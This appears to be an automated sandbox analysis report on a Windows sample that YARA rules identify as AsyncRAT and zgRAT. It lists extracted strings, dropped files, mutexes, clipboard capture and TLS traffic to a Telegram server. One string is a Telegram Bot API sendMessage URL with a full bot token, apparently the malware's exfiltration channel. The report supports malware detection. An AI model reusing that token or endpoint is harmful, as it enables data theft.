Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133348072.00000234352C0000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135768597.000002343558D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B94D8000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegrP
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: RegSvcs.exe, 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, btjxg.exe.3.dr, btjxg.exe.4.dr	String found in binary or memory: https://api.telegram.org/bot
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=12676
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184EA06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9A46000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

Window created: window name: CLIPBRDWNDCLASS

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\btjxg.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1AB1	0_2_00007FF8489B1AB1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1BA9	0_2_00007FF8489B1BA9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B5B12	0_2_00007FF8489B5B12
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B15A9	0_2_00007FF8489B15A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B629D	0_2_00007FF8489B629D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B0848	0_2_00007FF8489B0848
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B63A9	0_2_00007FF8489B63A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B63E8	0_2_00007FF8489B63E8
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6331	0_2_00007FF8489B6331
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B630E	0_2_00007FF8489B630E
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B636D	0_2_00007FF8489B636D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3CD3	0_2_00007FF8489B3CD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6421	0_2_00007FF8489B6421
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3BFB	0_2_00007FF8489B3BFB
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3C08	0_2_00007FF8489B3C08
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6477	0_2_00007FF8489B6477
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6457	0_2_00007FF8489B6457
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B5593	0_2_00007FF8489B5593
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B76AC	0_2_00007FF8489B76AC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3F9D	0_2_00007FF8489B3F9D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1793	0_2_00007FF8489B1793
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3FD3	0_2_00007FF8489B3FD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A81B44	0_2_00007FF848A81B44
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A83424	0_2_00007FF848A83424
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A82F10	0_2_00007FF848A82F10
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848B60D41	0_2_00007FF848B60D41
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848B61FFA	0_2_00007FF848B61FFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B76AC	2_2_00007FF8489B76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B4000	2_2_00007FF8489B4000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489ECAD0	2_2_00007FF8489ECAD0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E5628	2_2_00007FF8489E5628
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E5648	2_2_00007FF8489E5648
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E83F8	2_2_00007FF8489E83F8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E9CC0	2_2_00007FF8489E9CC0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B1AE6	2_2_00007FF8489B1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B1BA9	2_2_00007FF8489B1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A06582	2_2_00007FF848A06582
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A111A8	2_2_00007FF848A111A8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489F79ED	2_2_00007FF8489F79ED
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A057D6	2_2_00007FF848A057D6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489F5849	2_2_00007FF8489F5849
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A81B44	2_2_00007FF848A81B44
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A82F10	2_2_00007FF848A82F10
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A83424	2_2_00007FF848A83424
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A83264	2_2_00007FF848A83264
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D15A9	3_2_00007FF8489D15A9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D1AE6	3_2_00007FF8489D1AE6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D1BA9	3_2_00007FF8489D1BA9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D76AC	3_2_00007FF8489D76AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3F9D	3_2_00007FF8489D3F9D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3FD3	3_2_00007FF8489D3FD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3CD3	3_2_00007FF8489D3CD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3BFB	3_2_00007FF8489D3BFB
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3C08	3_2_00007FF8489D3C08
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848AA1B44	3_2_00007FF848AA1B44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B713C1	3_2_00007FF848B713C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B702FA	3_2_00007FF848B702FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B703FA	3_2_00007FF848B703FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B768BD	3_2_00007FF848B768BD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C05B0	4_2_00007FF8489C05B0
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C8542	4_2_00007FF8489C8542
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489CDACD	4_2_00007FF8489CDACD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C7396	4_2_00007FF8489C7396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848A7169D	5_2_00007FF848A7169D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848A730E9	5_2_00007FF848A730E9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C1AE6	7_2_00007FF8489C1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C1BA9	7_2_00007FF8489C1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3CD3	7_2_00007FF8489C3CD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3BFA	7_2_00007FF8489C3BFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3C08	7_2_00007FF8489C3C08
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C76AC	7_2_00007FF8489C76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3F9D	7_2_00007FF8489C3F9D
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3FD3	7_2_00007FF8489C3FD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF848A91B58	7_2_00007FF848A91B58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF848A730E9	10_2_00007FF848A730E9

Source: TypeId.exe.0.dr	Static PE information: No import functions for PE file found
Source: 9NBx4Vmiuj.exe	Static PE information: No import functions for PE file found

Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe	Binary or memory string: OriginalFilenameOzsekpshyu.exe" vs 9NBx4Vmiuj.exe

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\btjxg.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: 9NBx4Vmiuj.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TypeId.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\444118017aca01d9d0dde7
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\66369895937b82c448aed43e9a0f200e
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Mutant created: \Sessions\1\BaseNamedObjects\i0Yq2Adr82znjD2G

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
